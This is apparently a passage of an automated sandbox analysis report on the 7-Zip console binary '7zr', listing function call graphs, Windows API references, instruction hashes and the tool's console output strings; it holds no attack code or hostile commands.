VariantClear 76942->77000 76944->76800 76944->76801 76945->76929 77002 ad95df VariantClear 76945->77002 76948->76813 76949->76813 76950->76816 76951->76832 76952->76844 76953->76846 76954->76853 76955->76855 76956->76860 76957->76863 76958->76867 76959->76871 76960->76873 76961->76813 76962->76861 76963->76870 76964->76879 76965->76882 76966->76886 76967->76890 76968->76895 76969->76813 76970->76925 76971->76925 76972->76925 76973->76925 76974->76925 76975->76887 76976->76894 76977->76899 76982->76902 76983->76907 76984->76911 76985->76917 76989->76826 76990->76828 76991->76833 76992->76837 76993->76841 76994->76813 77005 ad9767 76995->77005 76997 ad9518 SysAllocStringLen 76998 ad954f 76997->76998 76999 ad9539 _CxxThrowException 76997->76999 76998->76929 76999->76998 77000->76929 77001->76929 77002->76929 77003->76929 77004->76934 77006 ad9779 77005->77006 77007 ad9770 77005->77007 77010 ad9686 VariantClear 77006->77010 77007->76997 77009 ad9780 77009->76997 77010->77009 77012 b2151b __EH_prolog 77011->77012 77018 b210d3 77012->77018 77015 b21552 _CxxThrowException 77015->76775 77016 b21589 77015->77016 77016->76775 77017->76774 77019 b210dd __EH_prolog 77018->77019 77020 b1d1b7 free 77019->77020 77021 b210f2 77020->77021 77022 b212ef 77021->77022 77027 ae1168 10 API calls 77021->77027 77031 b211f4 77021->77031 77022->77015 77022->77016 77023 b2139e 77023->77022 77024 b213c4 77023->77024 77025 ad1e0c ctype 2 API calls 77023->77025 77026 ae1168 10 API calls 77024->77026 77025->77024 77029 b213da 77026->77029 77027->77031 77032 b213f9 77029->77032 77042 b213de 77029->77042 77085 b1ef67 _CxxThrowException 77029->77085 77031->77022 77049 adb95a 6 API calls 77031->77049 77050 b1f047 77032->77050 77035 b214ba 77089 b20943 50 API calls 2 library calls 77035->77089 77036 b21450 77054 b206ae 77036->77054 77039 b214e7 77090 b02db9 free ctype 77039->77090 77091 ad1e40 free 77042->77091 77045 b2148e 77046 b1f047 _CxxThrowException 77045->77046 77047 b214ac 77046->77047 77047->77035 77088 b1ef67 _CxxThrowException 77047->77088 77049->77023 77051 b1f063 77050->77051 77052 b1f072 77051->77052 77092 b1ef67 _CxxThrowException 77051->77092 77052->77035 77052->77036 77086 b1ef67 _CxxThrowException 77052->77086 77055 b206b8 __EH_prolog 77054->77055 77093 b203f4 77055->77093 77057 ae12a5 5 API calls 77068 b20715 77057->77068 77058 b1b8dc ctype free 77059 b208a6 77058->77059 77123 ad1e40 free 77059->77123 77061 b208e3 _CxxThrowException 77063 b208f7 77061->77063 77062 b208ae 77124 ad1e40 free 77062->77124 77067 b1b8dc ctype free 77063->77067 77065 ad429a 3 API calls 77065->77068 77066 b208b6 77125 ad1e40 free 77066->77125 77071 b20914 77067->77071 77068->77057 77068->77061 77068->77063 77068->77065 77069 ad1e0c ctype 2 API calls 77068->77069 77080 b181ec 29 API calls 77068->77080 77083 b20877 77068->77083 77084 b1ef67 _CxxThrowException 77068->77084 77069->77068 77127 ad1e40 free 77071->77127 77073 b208be 77126 b1c149 free ctype 77073->77126 77074 b2091c 77128 ad1e40 free 77074->77128 77077 b208d0 77077->77039 77077->77045 77087 b1ef67 _CxxThrowException 77077->77087 77078 b20924 77129 ad1e40 free 77078->77129 77080->77068 77081 b2092c 77130 b1c149 free ctype 77081->77130 77083->77058 77084->77068 77085->77032 77086->77036 77087->77045 77088->77035 77089->77039 77090->77042 77091->77022 77092->77052 77094 b1f047 _CxxThrowException 77093->77094 77095 b20407 77094->77095 77096 b20475 77095->77096 77098 b1f047 _CxxThrowException 77095->77098 77097 b2049a 77096->77097 77134 b1fa3f 22 API calls 2 library calls 77096->77134 77099 b204b8 77097->77099 77135 b2159a malloc _CxxThrowException free ctype 77097->77135 77101 b20421 77098->77101 77100 b204e8 77099->77100 77103 b204cd 77099->77103 77137 b27c4a malloc _CxxThrowException free ctype 77100->77137 77104 b2043e 77101->77104 77131 b1ef67 _CxxThrowException 77101->77131 77136 b1fff0 9 API calls 2 library calls 77103->77136 77132 b1f93c 7 API calls 2 library calls 77104->77132 77106 b20492 77109 b1f047 _CxxThrowException 77106->77109 77109->77097 77111 b204db 77115 b1f047 _CxxThrowException 77111->77115 77113 b204e3 77117 b2054a 77113->77117 77139 b1ef67 _CxxThrowException 77113->77139 77114 b20446 77116 b2046d 77114->77116 77133 b1ef67 _CxxThrowException 77114->77133 77115->77113 77118 b1f047 _CxxThrowException 77116->77118 77117->77068 77118->77096 77119 b204f3 77119->77113 77138 ae089e malloc _CxxThrowException free _CxxThrowException memcpy 77119->77138 77123->77062 77124->77066 77125->77073 77126->77077 77127->77074 77128->77078 77129->77081 77130->77077 77131->77104 77132->77114 77133->77116 77134->77106 77135->77099 77136->77111 77137->77119 77138->77119 77139->77117 77140 afd3c2 77141 afd3e9 77140->77141 77142 ad965d VariantClear 77141->77142 77143 afd42a 77142->77143 77144 afd883 2 API calls 77143->77144 77145 afd4b1 77144->77145 77231 af8d4a 77145->77231 77148 af8b05 VariantClear 77150 afd4e3 77148->77150 77149 af2a72 2 API calls 77151 afd54c 77149->77151 77150->77149 77152 ad2fec 3 API calls 77151->77152 77153 afd594 77152->77153 77154 afd5cd 77153->77154 77155 afd742 77153->77155 77157 afd7d9 77154->77157 77248 af9317 77154->77248 77263 afcd49 malloc _CxxThrowException free 77155->77263 77266 ad1e40 free 77157->77266 77159 afd754 77162 ad2fec 3 API calls 77159->77162 77165 afd763 77162->77165 77163 afd7e1 77267 ad1e40 free 77163->77267 77164 afd5f1 77167 b104d2 5 API calls 77164->77167 77264 ad1e40 free 77165->77264 77170 afd5f9 77167->77170 77169 afd7e9 77172 af326b free 77169->77172 77254 afe332 77170->77254 77171 afd76b 77265 ad1e40 free 77171->77265 77182 afd69a 77172->77182 77176 afd773 77178 af326b free 77176->77178 77178->77182 77179 afd610 77261 ad1e40 free 77179->77261 77181 afd618 77183 af326b free 77181->77183 77184 afd2a8 77183->77184 77184->77182 77206 afd883 77184->77206 77187 ad2fec 3 API calls 77188 afd361 77187->77188 77189 ad2fec 3 API calls 77188->77189 77190 afd36d 77189->77190 77218 afd0e1 77190->77218 77192 afd380 77193 afd38a 77192->77193 77194 afd665 77192->77194 77195 b104d2 5 API calls 77193->77195 77196 afd68b 77194->77196 77262 afcd49 malloc _CxxThrowException free 77194->77262 77198 afd392 77195->77198 77197 af326b free 77196->77197 77197->77182 77201 afe332 2 API calls 77198->77201 77200 afd67c 77202 ad2fec 3 API calls 77200->77202 77203 afd3a1 77201->77203 77202->77196 77204 af326b free 77203->77204 77205 afd3b0 77204->77205 77207 afd88d __EH_prolog 77206->77207 77208 ad2e04 2 API calls 77207->77208 77209 afd8c6 77208->77209 77210 ad2e04 2 API calls 77209->77210 77211 afd8d2 77210->77211 77212 ad2e04 2 API calls 77211->77212 77213 afd8de 77212->77213 77214 af2b63 2 API calls 77213->77214 77215 afd8fa 77214->77215 77216 af2b63 2 API calls 77215->77216 77217 afd34f 77216->77217 77217->77187 77219 afd0eb __EH_prolog 77218->77219 77220 afd10b 77219->77220 77221 afd138 77219->77221 77222 ad1e0c ctype 2 API calls 77220->77222 77223 ad1e0c ctype 2 API calls 77221->77223 77225 afd112 77221->77225 77222->77225 77224 afd14b 77223->77224 77226 ad2fec 3 API calls 77224->77226 77225->77192 77227 afd17b 77226->77227 77268 ad7b41 28 API calls 77227->77268 77229 afd18a 77229->77225 77269 ad757d GetLastError 77229->77269 77238 af8d54 __EH_prolog 77231->77238 77232 af8e09 77234 ad965d VariantClear 77232->77234 77233 af8e15 77235 af8e2d 77233->77235 77236 af8e5e 77233->77236 77240 af8e21 77233->77240 77239 af8e11 77234->77239 77235->77236 77237 af8e2b 77235->77237 77241 ad965d VariantClear 77236->77241 77243 ad965d VariantClear 77237->77243 77246 af8da4 77238->77246 77270 ad2b55 malloc _CxxThrowException free _CxxThrowException ctype 77238->77270 77239->77148 77271 ad3097 malloc _CxxThrowException free SysStringLen ctype 77240->77271 77241->77239 77245 af8e47 77243->77245 77245->77239 77272 af8e7c 6 API calls __EH_prolog 77245->77272 77246->77232 77246->77233 77246->77239 77249 af9321 __EH_prolog 77248->77249 77253 af9360 77249->77253 77273 ad9686 VariantClear 77249->77273 77250 ad965d VariantClear 77251 af93d0 77250->77251 77251->77157 77251->77164 77253->77250 77255 afe33c __EH_prolog 77254->77255 77256 ad1e0c ctype 2 API calls 77255->77256 77257 afe34a 77256->77257 77259 afd608 77257->77259 77274 afe3d1 malloc _CxxThrowException __EH_prolog 77257->77274 77260 ad1e40 free 77259->77260 77260->77179 77261->77181 77262->77200 77263->77159 77264->77171 77265->77176 77266->77163 77267->77169 77268->77229 77269->77225 77270->77246 77271->77237 77272->77239 77273->77253 77274->77259 77275 ae1ade 77276 ae1ae8 __EH_prolog 77275->77276 77326 ad13f5 77276->77326 77279 ae1b32 6 API calls 77281 ae1b8d 77279->77281 77290 ae1bf8 77281->77290 77344 ae1ea4 9 API calls 77281->77344 77282 ae1b24 _CxxThrowException 77282->77279 77284 ae1bdf 77285 ad27bb 3 API calls 77284->77285 77286 ae1bec 77285->77286 77345 ad1e40 free 77286->77345 77288 ae1c89 77340 ae1eb9 77288->77340 77290->77288 77346 af1d73 5 API calls __EH_prolog 77290->77346 77294 ae1cb2 _CxxThrowException 77294->77288 77327 ad13ff __EH_prolog 77326->77327 77328 af7ebb free 77327->77328 77329 ad142b 77328->77329 77330 ad1438 77329->77330 77347 ad1212 free ctype 77329->77347 77332 ad1e0c ctype 2 API calls 77330->77332 77333 ad144d 77332->77333 77334 b104d2 5 API calls 77333->77334 77337 ad1507 77333->77337 77339 ad14f4 77333->77339 77348 ad1265 5 API calls 2 library calls 77333->77348 77349 ad1524 malloc _CxxThrowException __EH_prolog ctype 77333->77349 77334->77333 77338 ad2fec 3 API calls 77337->77338 77338->77339 77339->77279 77343 af1d73 5 API calls __EH_prolog 77339->77343 77350 ad9313 GetCurrentProcess OpenProcessToken 77340->77350 77343->77282 77344->77284 77345->77290 77346->77294 77347->77330 77348->77333 77349->77333 77351 ad933a LookupPrivilegeValueW 77350->77351 77352 ad9390 77350->77352 77353 ad934c AdjustTokenPrivileges 77351->77353 77354 ad9382 77351->77354 77353->77354 77355 ad9372 GetLastError 77353->77355 77356 ad9385 CloseHandle 77354->77356 77355->77356 77356->77352 77357 b10343 77362 b1035f 77357->77362 77360 b10358 77363 b10369 __EH_prolog 77362->77363 77379 ae139e 77363->77379 77368 b10143 ctype free 77369 b1039a 77368->77369 77389 ad1e40 free 77369->77389 77371 b103a2 77390 ad1e40 free 77371->77390 77373 b103aa 77391 b103d8 77373->77391 77378 ad1e40 free 77378->77360 77380 ae13ae 77379->77380 77381 ae13b3 77379->77381 77407 b67ea0 SetEvent GetLastError 77380->77407 77383 b101c4 77381->77383 77384 b101ce __EH_prolog 77383->77384 77387 b10203 77384->77387 77409 ad1e40 free 77384->77409 77386 b1020b 77386->77368 77408 ad1e40 free 77387->77408 77389->77371 77390->77373 77392 b103e2 __EH_prolog 77391->77392 77393 ae139e ctype 2 API calls 77392->77393 77394 b103fb 77393->77394 77410 b67d50 77394->77410 77396 b10403 77397 b67d50 ctype 2 API calls 77396->77397 77398 b1040b 77397->77398 77399 b67d50 ctype 2 API calls 77398->77399 77400 b103b7 77399->77400 77401 b1004a 77400->77401 77402 b10054 __EH_prolog 77401->77402 77416 ad1e40 free 77402->77416 77404 b10067 77417 ad1e40 free 77404->77417 77406 b1006f 77406->77360 77406->77378 77407->77381 77408->77386 77409->77384 77411 b67d59 CloseHandle 77410->77411 77414 b67d7b 77410->77414 77412 b67d64 GetLastError 77411->77412 77413 b67d75 77411->77413 77412->77414 77415 b67d6e 77412->77415 77413->77414 77414->77396 77415->77396 77416->77404 77417->77406 77418 b56bc6 77419 b56bcd 77418->77419 77420 b56bca 77418->77420 77419->77420 77421 b56bd1 malloc 77419->77421 77421->77420 77422 adb5d9 77423 adb5f7 77422->77423 77424 adb5e6 77422->77424 77424->77423 77428 adb5fe 77424->77428 77429 adb608 __EH_prolog 77428->77429 77435 b56a40 VirtualFree 77429->77435 77431 adb63d 77432 ad764c CloseHandle 77431->77432 77433 adb5f1 77432->77433 77434 ad1e40 free 77433->77434 77434->77423 77435->77431 77436 ad42d1 77437 ad42bd 77436->77437 77438 ad42c5 77437->77438 77439 ad1e0c ctype 2 API calls 77437->77439 77439->77438
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00B181F1
                                                            • Part of subcall function 00B1F749: _CxxThrowException.MSVCRT(?,00B84A58), ref: 00B1F792
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: ExceptionH_prologThrow
                                                          • String ID:
                                                          • API String ID: 461045715-3916222277
                                                          • Opcode ID: 50e8f70c63717ac248296761d693248946bf0ebf9c84183eeaa1afe51dc7629a
                                                          • Instruction ID: 0c2f426f44cd38e3c7f12337b1402e5f79cac624e284ae85817b6e6d77efea78
                                                          • Opcode Fuzzy Hash: 50e8f70c63717ac248296761d693248946bf0ebf9c84183eeaa1afe51dc7629a
                                                          • Instruction Fuzzy Hash: E4928C30900249DFDB15DFA8C884BEEBBF1FF19304F644499E815AB291CB759E85CBA1
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 00AD686D
                                                            • Part of subcall function 00AD6848: FindClose.KERNELBASE(00000000,?,00AD6880), ref: 00AD6853
                                                          • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 00AD68A5
                                                          • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 00AD68DE
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: Find$FileFirst$CloseH_prolog
                                                          • String ID:
                                                          • API String ID: 3371352514-0
                                                          • Opcode ID: da71ed2a7e8a25ec48e177c261ae26f3a78950b09f2db5ebcf7d33e3dd1f281c
                                                          • Instruction ID: 469f9385c07fe12f747e88d0b9c33fdfe168d0325ebcd94359cf6ca6568964c8
                                                          • Opcode Fuzzy Hash: da71ed2a7e8a25ec48e177c261ae26f3a78950b09f2db5ebcf7d33e3dd1f281c
                                                          • Instruction Fuzzy Hash: 9811B231500209DBCF10EFA4D9515FDBBB9EF50324F10466AE96257392DB368E85EB40

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 0 b0a013-b0a01a 1 b0a020-b0a02d call ae1ac8 0->1 2 b0a37a-b0a544 call b104d2 call ad1524 call b104d2 call ad1524 call ad1e0c 0->2 7 b0a033-b0a03a 1->7 8 b0a22e-b0a235 1->8 64 b0a551 2->64 65 b0a546-b0a54f call b0b0fa 2->65 10 b0a054-b0a089 call b092d3 7->10 11 b0a03c-b0a042 7->11 13 b0a367-b0a375 call b0b55f 8->13 14 b0a23b-b0a24d call b0b4f6 8->14 26 b0a099 10->26 27 b0a08b-b0a091 10->27 11->10 15 b0a044-b0a04f call ad30ea 11->15 28 b0ac23-b0ac2a 13->28 29 b0a259-b0a2fb call af7ebb call ad27bb call ad26dd call af3d70 call b0ad99 call ad27bb 14->29 30 b0a24f-b0a253 14->30 15->10 34 b0a09d-b0a0de call ad2fec call b0b369 26->34 27->26 33 b0a093-b0a097 27->33 35 b0ac3a-b0ac66 call b0b96d call ad1e40 call af3247 28->35 36 b0ac2c-b0ac33 28->36 94 b0a303-b0a362 call b0b6ab call b02db9 call ad1e40 * 2 call b0bff8 29->94 95 b0a2fd 29->95 30->29 33->34 58 b0a0e0-b0a0e4 34->58 59 b0a0ea-b0a0fa 34->59 68 b0ac68-b0ac6a 35->68 69 b0ac6e-b0acb5 call ad1e40 call ad11c2 call b0be0c call b02db9 35->69 36->35 40 b0ac35 36->40 45 b0ac35 call b0b988 40->45 45->35 58->59 60 b0a0fc-b0a102 59->60 61 b0a10d 59->61 60->61 66 b0a104-b0a10b 60->66 67 b0a114-b0a19e call ad2fec call af7ebb call b0ad99 61->67 72 b0a553-b0a55c 64->72 65->72 66->67 103 b0a1a2 call aff8e0 67->103 68->69 77 b0a564-b0a5c1 call ad2fec call b0b277 72->77 78 b0a55e-b0a560 72->78 96 b0a5c3-b0a5c7 77->96 97 b0a5cd-b0a652 call b0ad06 call b0bf3e call ae3a29 call ad2e04 call af4345 77->97 78->77 94->28 95->94 96->97 136 b0a654-b0a671 call af375c call b0b96d 97->136 137 b0a676-b0a6c8 call af2096 97->137 107 b0a1a7-b0a1b1 103->107 111 b0a1c0-b0a1c9 107->111 112 b0a1b3-b0a1bb call b0c7d7 107->112 117 b0a1d1-b0a229 call b0b6ab call b02db9 call ad1e40 call b0bfa4 call b0940b 111->117 118 b0a1cb 111->118 112->111 117->28 118->117 136->137 143 b0a6cd-b0a6d6 137->143 146 b0a6e2-b0a6e5 143->146 147 b0a6d8-b0a6dd call b0c7d7 143->147 150 b0a6e7-b0a6ee 146->150 151 b0a72e-b0a73a 146->151 147->146 154 b0a6f0-b0a71d call ad1fa0 fputs call ad1fa0 call ad1fb3 call ad1fa0 150->154 155 b0a722-b0a725 150->155 152 b0a73c-b0a74a call ad1fa0 151->152 153 b0a79e-b0a7aa 151->153 170 b0a755-b0a799 fputs call ad2201 call ad1fa0 fputs call ad2201 call ad1fa0 152->170 171 b0a74c-b0a753 152->171 156 b0a7d9-b0a7e5 153->156 157 b0a7ac-b0a7b2 153->157 154->155 155->151 158 b0a727 155->158 163 b0a7e7-b0a7ed 156->163 164 b0a818-b0a81a 156->164 157->156 161 b0a7b4-b0a7d4 fputs call ad2201 call ad1fa0 157->161 158->151 161->156 167 b0a899-b0a8a5 163->167 172 b0a7f3-b0a813 fputs call ad2201 call ad1fa0 163->172 164->167 168 b0a81c-b0a82b 164->168 179 b0a8a7-b0a8ad 167->179 180 b0a8e9-b0a8ed 167->180 174 b0a851-b0a85d 168->174 175 b0a82d-b0a84c fputs call ad2201 call ad1fa0 168->175 170->153 171->153 171->170 172->164 174->167 185 b0a85f-b0a872 call ad1fa0 174->185 175->174 181 b0a8ef 179->181 182 b0a8af-b0a8c2 call ad1fa0 179->182 180->181 186 b0a8f6-b0a8f8 180->186 181->186 182->181 207 b0a8c4-b0a8e4 fputs call ad2201 call ad1fa0 182->207 185->167 209 b0a874-b0a894 fputs call ad2201 call ad1fa0 185->209 194 b0a8fe-b0a90a 186->194 195 b0aaaf-b0aaeb call af43b3 call ad1e40 call b0c104 call b0ad82 186->195 204 b0a910-b0a91f 194->204 205 b0aa73-b0aa89 call ad1fa0 194->205 246 b0aaf1-b0aaf7 195->246 247 b0ac0b-b0ac1e call b02db9 * 2 195->247 204->205 211 b0a925-b0a929 204->211 205->195 220 b0aa8b-b0aaaa fputs call ad2201 call ad1fa0 205->220 207->180 209->167 211->195 217 b0a92f-b0a93d 211->217 223 b0a96a-b0a971 217->223 224 b0a93f-b0a964 fputs call ad2201 call ad1fa0 217->224 220->195 225 b0a973-b0a97a 223->225 226 b0a98f-b0a9a8 fputs call ad2201 223->226 224->223 225->226 233 b0a97c-b0a982 225->233 241 b0a9ad-b0a9bd call ad1fa0 226->241 233->226 239 b0a984-b0a98d 233->239 239->226 244 b0aa06-b0aa1f fputs call ad2201 239->244 241->244 252 b0a9bf-b0aa01 fputs call ad2201 call ad1fa0 fputs call ad2201 call ad1fa0 241->252 251 b0aa24-b0aa29 call ad1fa0 244->251 246->247 247->28 258 b0aa2e-b0aa4b fputs call ad2201 251->258 252->244 263 b0aa50-b0aa5b call ad1fa0 258->263 263->195 269 b0aa5d-b0aa71 call ad1fa0 call b0710e 263->269 269->195
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: fputs$ExceptionThrow
                                                          • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $N
                                                          • API String ID: 3665150552-429544124
                                                          • Opcode ID: 08ee061b74dca183d99285391488da40d0f788e76eb3fb5efa16620349af2b86
                                                          • Instruction ID: e8395e08c676968ef313ccdabc012c2065fcbbc4d795ad90ba7e836ed4f6929d
                                                          • Opcode Fuzzy Hash: 08ee061b74dca183d99285391488da40d0f788e76eb3fb5efa16620349af2b86
                                                          • Instruction Fuzzy Hash: F2527831A042589FDF26EBA4C995BEDBBF5EF54300F1444DAE44A672A1DB306E88CF11

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 274 b0a42c-b0a433 275 b0a435-b0a444 fputs call ad1fa0 274->275 276 b0a449-b0a4df call b0545d call ad2e04 call af1858 call ad1e40 274->276 275->276 286 b0a4e1-b0a4e9 call b0c7d7 276->286 287 b0a4ee-b0a4f1 276->287 286->287 289 b0a4f3-b0a4fa 287->289 290 b0a50e-b0a520 call b0c73e 287->290 289->290 291 b0a4fc-b0a509 call b057fb 289->291 295 b0a526-b0a544 call ad1e0c 290->295 296 b0ac0b-b0ac2a call b02db9 * 2 290->296 291->290 304 b0a551 295->304 305 b0a546-b0a54f call b0b0fa 295->305 306 b0ac3a-b0ac66 call b0b96d call ad1e40 call af3247 296->306 307 b0ac2c-b0ac33 296->307 309 b0a553-b0a55c 304->309 305->309 327 b0ac68-b0ac6a 306->327 328 b0ac6e-b0acb5 call ad1e40 call ad11c2 call b0be0c call b02db9 306->328 307->306 310 b0ac35 call b0b988 307->310 313 b0a564-b0a5c1 call ad2fec call b0b277 309->313 314 b0a55e-b0a560 309->314 310->306 325 b0a5c3-b0a5c7 313->325 326 b0a5cd-b0a652 call b0ad06 call b0bf3e call ae3a29 call ad2e04 call af4345 313->326 314->313 325->326 348 b0a654-b0a671 call af375c call b0b96d 326->348 349 b0a676-b0a6d6 call af2096 326->349 327->328 348->349 355 b0a6e2-b0a6e5 349->355 356 b0a6d8-b0a6dd call b0c7d7 349->356 358 b0a6e7-b0a6ee 355->358 359 b0a72e-b0a73a 355->359 356->355 362 b0a6f0-b0a71d call ad1fa0 fputs call ad1fa0 call ad1fb3 call ad1fa0 358->362 363 b0a722-b0a725 358->363 360 b0a73c-b0a74a call ad1fa0 359->360 361 b0a79e-b0a7aa 359->361 378 b0a755-b0a799 fputs call ad2201 call ad1fa0 fputs call ad2201 call ad1fa0 360->378 379 b0a74c-b0a753 360->379 364 b0a7d9-b0a7e5 361->364 365 b0a7ac-b0a7b2 361->365 362->363 363->359 366 b0a727 363->366 371 b0a7e7-b0a7ed 364->371 372 b0a818-b0a81a 364->372 365->364 369 b0a7b4-b0a7d4 fputs call ad2201 call ad1fa0 365->369 366->359 369->364 375 b0a899-b0a8a5 371->375 380 b0a7f3-b0a813 fputs call ad2201 call ad1fa0 371->380 372->375 376 b0a81c-b0a82b 372->376 387 b0a8a7-b0a8ad 375->387 388 b0a8e9-b0a8ed 375->388 382 b0a851-b0a85d 376->382 383 b0a82d-b0a84c fputs call ad2201 call ad1fa0 376->383 378->361 379->361 379->378 380->372 382->375 393 b0a85f-b0a872 call ad1fa0 382->393 383->382 389 b0a8ef 387->389 390 b0a8af-b0a8c2 call ad1fa0 387->390 388->389 394 b0a8f6-b0a8f8 388->394 389->394 390->389 415 b0a8c4-b0a8e4 fputs call ad2201 call ad1fa0 390->415 393->375 417 b0a874-b0a894 fputs call ad2201 call ad1fa0 393->417 402 b0a8fe-b0a90a 394->402 403 b0aaaf-b0aaeb call af43b3 call ad1e40 call b0c104 call b0ad82 394->403 412 b0a910-b0a91f 402->412 413 b0aa73-b0aa89 call ad1fa0 402->413 403->296 454 b0aaf1-b0aaf7 403->454 412->413 419 b0a925-b0a929 412->419 413->403 428 b0aa8b-b0aaaa fputs call ad2201 call ad1fa0 413->428 415->388 417->375 419->403 425 b0a92f-b0a93d 419->425 431 b0a96a-b0a971 425->431 432 b0a93f-b0a964 fputs call ad2201 call ad1fa0 425->432 428->403 433 b0a973-b0a97a 431->433 434 b0a98f-b0a9a8 fputs call ad2201 431->434 432->431 433->434 441 b0a97c-b0a982 433->441 449 b0a9ad-b0a9bd call ad1fa0 434->449 441->434 447 b0a984-b0a98d 441->447 447->434 452 b0aa06-b0aa4b fputs call ad2201 call ad1fa0 fputs call ad2201 447->452 449->452 458 b0a9bf-b0aa01 fputs call ad2201 call ad1fa0 fputs call ad2201 call ad1fa0 449->458 467 b0aa50-b0aa5b call ad1fa0 452->467 454->296 458->452 467->403 473 b0aa5d-b0aa71 call ad1fa0 call b0710e 467->473 473->403
                                                          APIs
                                                          • fputs.MSVCRT(Scanning the drive for archives:), ref: 00B0A43E
                                                            • Part of subcall function 00AD1FA0: fputc.MSVCRT ref: 00AD1FA7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.1816097164.0000000000AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00AD0000, based on PE: true
                                                          • Associated: 0000000A.00000002.1816076718.0000000000AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816183320.0000000000B7C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816208205.0000000000B92000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                          • Associated: 0000000A.00000002.1816230717.0000000000B9B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_ad0000_7zr.jbxd
                                                          Similarity
                                                          • API ID: fputcfputs
                                                          • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $!"$N
                                                          • API String ID: 269475090-3104439828
                                                          • Opcode ID: 9f5d2daeba5bbe07fd65918de3fae0d58d8c4ec3a21f0b34831d61d22d912f0c
                                                          • Instruction ID: b1261b271d916d23ffcb1e0439e3ddfc7606eba69836dbc1ca944e8ebe6afa91
                                                          • Opcode Fuzzy Hash: 9f5d2daeba5bbe07fd65918de3fae0d58d8c4ec3a21f0b34831d61d22d912f0c
                                                          • Instruction Fuzzy Hash: D4226931A002489FDF26EBA4C996BEDBBF5EF54300F1445DAE44A672A1DB706E84CF11

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 777 b08012-b08032 call b6fb10 780 b08285 777->780 781 b08038-b0806c fputs call b08341 777->781 782 b08287-b08295 780->782 785 b080c8-b080cd 781->785 786 b0806e-b08071 781->786 789 b080d6-b080df 785->789 790 b080cf-b080d4 785->790 787 b08073-b08089 fputs call ad1fa0 786->787 788 b0808b-b0808d 786->788 787->785 793 b08096-b0809f 788->793 794 b0808f-b08094 788->794 791 b080e2-b08110 call b08341 call b08622 789->791 790->791 804 b08112-b08119 call b0831f 791->804 805 b0811e-b0812f call b08565 791->805 797 b080a2-b080c7 call ad2e47 call b085c6 call ad1e40 793->797 794->797 797->785 804->805 805->782 812 b08135-b0813f 805->812 813 b08141-b08148 call b082bb 812->813 814 b0814d-b0815b 812->814 813->814 814->782 817 b08161-b08164 814->817 818 b081b6-b081c0 817->818 819 b08166-b08186 817->819 820 b08276-b0827f 818->820 821 b081c6-b081e1 fputs 818->821 823 b08298-b0829d 819->823 824 b0818c-b08196 call b08565 819->824 820->780 820->781 821->820 827 b081e7-b081fb 821->827 828 b082b1-b082b9 SysFreeString 823->828 829 b0819b-b0819d 824->829 830 b08273 827->830 831 b081fd-b0821f 827->831 828->782 829->823 832 b081a3-b081b4 SysFreeString 829->832 830->820 834 b08221-b08245 831->834 835 b0829f-b082a1 831->835 832->818 832->819 838 b082a3-b082ab call ad965d 834->838 839 